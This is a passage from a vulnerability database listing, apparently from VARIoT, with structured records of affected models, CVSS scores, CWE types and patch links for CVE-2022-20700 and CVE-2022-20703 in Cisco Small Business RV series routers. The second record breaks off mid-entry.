
    13 vulnerabilities found for rv160w by cisco

    VAR-202202-0893

    Vulnerability from variot - Updated: 2025-11-18 15:34

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service may be put into a denial-of-service (DoS) state. The record below lists affected firmware as 1.0.01.05 and earlier for the RV160/RV260 models and 1.0.03.24 and earlier for the RV340/RV345 models, and its references include the CISA Known Exploited Vulnerabilities catalog page for CVE-2022-20700.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0893",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "cve": "CVE-2022-20700",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2022-20700",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20700",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "psirt@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20700",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20700",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20700",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "psirt@cisco.com",
                "id": "CVE-2022-20700",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20700",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-176",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20700",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20700",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020302",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20700",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "id": "VAR-202202-0893",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2025-11-18T15:34:36.789000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=182686"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Known Exploited Vulnerabilities Detector",
            "trust": 0.1,
            "url": "https://github.com/Ostorlab/KEV "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2022-20700"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20700"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020302"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "date": "2023-05-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "date": "2022-02-10T18:15:09.033000",
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "date": "2022-02-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "date": "2023-05-11T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "date": "2025-10-28T13:58:18.223000",
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0323

    Vulnerability from variot - Updated: 2025-11-18 15:12

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service may be put into a denial-of-service (DoS) state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root. The record below lists affected firmware as 1.0.01.05 and earlier for the RV160/RV260 models and 1.0.03.24 and earlier for the RV340/RV345 models.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0323",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv340",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          }
        ],
        "trust": 1.3
      },
      "cve": "CVE-2022-20703",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.2,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20703",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.0,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.1,
                "id": "CVE-2022-20703",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "psirt@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20703",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Local",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.4,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20703",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 7.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2022-20703",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "REQUIRED",
                "vectorString": "AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20703",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "ZDI",
                "id": "CVE-2022-20703",
                "trust": 1.4,
                "value": "HIGH"
              },
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20703",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "psirt@cisco.com",
                "id": "CVE-2022-20703",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20703",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-164",
